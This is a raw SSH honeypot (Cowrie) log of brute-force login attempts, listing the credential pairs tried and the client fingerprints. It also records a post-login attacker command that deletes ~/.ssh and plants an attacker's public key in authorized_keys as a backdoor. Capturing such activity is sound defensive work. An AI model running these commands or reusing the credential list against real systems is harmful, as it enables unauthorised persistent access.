0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:35:33.796578Z","src_ip":"212.227.235.229","session":"88ca6298217f"}
{"eventid":"cowrie.login.failed","username":"sonar","password":"123456","message":"login attempt [sonar/123456] failed","sensor":"my-vps","timestamp":"2025-08-28T06:35:34.549883Z","src_ip":"212.227.235.229","session":"88ca6298217f"}
{"eventid":"cowrie.session.closed","duration":9.999920845031738,"message":"Connection lost after 9 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:35:35.118279Z","src_ip":"212.227.125.160","session":"fdd5b5bcc6ee"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":65208,"dst_ip":"1.2.3.4","dst_port":22,"session":"8201219442d7","protocol":"ssh","message":"New connection: 217.72.205.35:65208 (1.2.3.4:22) [session: 8201219442d7]","sensor":"my-vps","timestamp":"2025-08-28T06:35:35.546186Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:35:35.547411Z","src_ip":"217.72.205.35","session":"8201219442d7"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:35:35.801553Z","src_ip":"212.227.235.229","session":"88ca6298217f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":46290,"dst_ip":"1.2.3.4","dst_port":22,"session":"0ad70717e813","protocol":"ssh","message":"New connection: 212.227.125.160:46290 (1.2.3.4:22) [session: 0ad70717e813]","sensor":"my-vps","timestamp":"2025-08-28T06:35:43.412047Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:35:43.425661Z","src_ip":"212.227.125.160","session":"0ad70717e813"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:35:43.631891Z","src_ip":"212.227.125.160","session":"0ad70717e813"}
{"eventid":"cowrie.login.failed","username":"jumpserver","password":"jumpserver","message":"login attempt [jumpserver/jumpserver] failed","sensor":"my-vps","timestamp":"2025-08-28T06:35:44.782838Z","src_ip":"212.227.125.160","session":"0ad70717e813"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:35:46.005256Z","src_ip":"212.227.125.160","session":"0ad70717e813"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":54126,"dst_ip":"1.2.3.4","dst_port":22,"session":"a7cb5de0ac26","protocol":"ssh","message":"New connection: 212.227.235.229:54126 (1.2.3.4:22) [session: a7cb5de0ac26]","sensor":"my-vps","timestamp":"2025-08-28T06:35:49.993019Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:35:49.993908Z","src_ip":"212.227.235.229","session":"a7cb5de0ac26"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:35:50.967367Z","src_ip":"212.227.235.229","session":"a7cb5de0ac26"}
{"eventid":"cowrie.login.failed","username":"jumpserver","password":"jumpserver","message":"login attempt [jumpserver/jumpserver] failed","sensor":"my-vps","timestamp":"2025-08-28T06:35:52.408344Z","src_ip":"212.227.235.229","session":"a7cb5de0ac26"}
{"eventid":"cowrie.session.closed","duration":"3.7","message":"Connection lost after 3.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:35:53.666873Z","src_ip":"212.227.235.229","session":"a7cb5de0ac26"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":55970,"dst_ip":"1.2.3.4","dst_port":22,"session":"e9434030b864","protocol":"ssh","message":"New connection: 212.227.125.160:55970 (1.2.3.4:22) [session: e9434030b864]","sensor":"my-vps","timestamp":"2025-08-28T06:35:59.654782Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:35:59.660905Z","src_ip":"212.227.125.160","session":"e9434030b864"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:35:59.881061Z","src_ip":"212.227.125.160","session":"e9434030b864"}
{"eventid":"cowrie.login.failed","username":"tom","password":"tom123","message":"login attempt [tom/tom123] failed","sensor":"my-vps","timestamp":"2025-08-28T06:36:00.774599Z","src_ip":"212.227.125.160","session":"e9434030b864"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:36:02.000111Z","src_ip":"212.227.125.160","session":"e9434030b864"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":54362,"dst_ip":"1.2.3.4","dst_port":22,"session":"c4efc52fc97e","protocol":"ssh","message":"New connection: 212.227.235.229:54362 (1.2.3.4:22) [session: c4efc52fc97e]","sensor":"my-vps","timestamp":"2025-08-28T06:36:06.227812Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:36:06.228774Z","src_ip":"212.227.235.229","session":"c4efc52fc97e"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:36:06.479665Z","src_ip":"212.227.235.229","session":"c4efc52fc97e"}
{"eventid":"cowrie.login.failed","username":"tom","password":"tom123","message":"login attempt [tom/tom123] failed","sensor":"my-vps","timestamp":"2025-08-28T06:36:07.234881Z","src_ip":"212.227.235.229","session":"c4efc52fc97e"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:36:08.488676Z","src_ip":"212.227.235.229","session":"c4efc52fc97e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":53239,"dst_ip":"1.2.3.4","dst_port":22,"session":"8aa5e4dd2a84","protocol":"ssh","message":"New connection: 212.227.125.160:53239 (1.2.3.4:22) [session: 8aa5e4dd2a84]","sensor":"my-vps","timestamp":"2025-08-28T06:36:09.885949Z"}
{"eventid":"cowrie.session.closed","duration":"0.4","message":"Connection lost after 0.4 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:36:10.320612Z","src_ip":"212.227.125.160","session":"8aa5e4dd2a84"}
{"eventid":"cowrie.session.connect","src_ip":"45.119.84.54","src_port":53848,"dst_ip":"1.2.3.4","dst_port":22,"session":"73ed720c0c40","protocol":"ssh","message":"New connection: 45.119.84.54:53848 (1.2.3.4:22) [session: 73ed720c0c40]","sensor":"my-vps","timestamp":"2025-08-28T06:36:12.239883Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T06:36:12.241176Z","src_ip":"45.119.84.54","session":"73ed720c0c40"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T06:36:12.449047Z","src_ip":"45.119.84.54","session":"73ed720c0c40"}
{"eventid":"cowrie.login.success","username":"root","password":"Root@1111","message":"login attempt [root/Root@1111] succeeded","sensor":"my-vps","timestamp":"2025-08-28T06:36:13.330189Z","src_ip":"45.119.84.54","session":"73ed720c0c40"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T06:36:13.765257Z","src_ip":"45.119.84.54","session":"73ed720c0c40"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-28T06:36:13.766048Z","src_ip":"45.119.84.54","session":"73ed720c0c40"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-28T06:36:13.767195Z","src_ip":"45.119.84.54","session":"73ed720c0c40"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:36:13.975969Z","src_ip":"45.119.84.54","session":"73ed720c0c40"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T06:36:14.524674Z","src_ip":"45.119.84.54","session":"73ed720c0c40"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-28T06:36:14.525485Z","src_ip":"45.119.84.54","session":"73ed720c0c40"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-28T06:36:14.735043Z","src_ip":"45.119.84.54","session":"73ed720c0c40"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:36:14.735966Z","src_ip":"45.119.84.54","session":"73ed720c0c40"}
{"eventid":"cowrie.session.connect","src_ip":"45.119.84.54","src_port":53856,"dst_ip":"1.2.3.4","dst_port":22,"session":"18fbca38eb6d","protocol":"ssh","message":"New connection: 45.119.84.54:53856 (1.2.3.4:22) [session: 18fbca38eb6d]","sensor":"my-vps","timestamp":"2025-08-28T06:36:14.944332Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T06:36:14.945033Z","src_ip":"45.119.84.54","session":"18fbca38eb6d"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T06:36:15.157550Z","src_ip":"45.119.84.54","session":"18fbca38eb6d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":47906,"dst_ip":"1.2.3.4","dst_port":22,"session":"0798db2d297f","protocol":"ssh","message":"New connection: 212.227.125.160:47906 (1.2.3.4:22) [session: 0798db2d297f]","sensor":"my-vps","timestamp":"2025-08-28T06:36:16.008549Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:36:16.018760Z","src_ip":"212.227.125.160","session":"0798db2d297f"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-28T06:36:16.034522Z","src_ip":"45.119.84.54","session":"18fbca38eb6d"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:36:16.227224Z","src_ip":"212.227.125.160","session":"0798db2d297f"}
{"eventid":"cowrie.login.failed","username":"root","password":"123456","message":"login attempt [root/123456] failed","sensor":"my-vps","timestamp":"2025-08-28T06:36:17.112583Z","src_ip":"212.227.125.160","session":"0798db2d297f"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:36:17.245904Z","src_ip":"45.119.84.54","session":"18fbca38eb6d"}
{"eventid":"cowrie.session.connect","src_ip":"45.119.84.54","src_port":53872,"dst_ip":"1.2.3.4","dst_port":22,"session":"655feb9f0a37","protocol":"ssh","message":"New connection: 45.119.84.54:53872 (1.2.3.4:22) [session: 655feb9f0a37]","sensor":"my-vps","timestamp":"2025-08-28T06:36:17.454599Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T06:36:17.455484Z","src_ip":"45.119.84.54","session":"655feb9f0a37"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T06:36:17.664078Z","src_ip":"45.119.84.54","session":"655feb9f0a37"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:36:18.331760Z","src_ip":"212.227.125.160","session":"0798db2d297f"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-28T06:36:18.541416Z","src_ip":"45.119.84.54","session":"655feb9f0a37"}
{"eventid":"cowrie.session.closed","duration":"6.5","message":"Connection lost after 6.5 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:36:18.751482Z","src_ip":"45.119.84.54","session":"73ed720c0c40"}
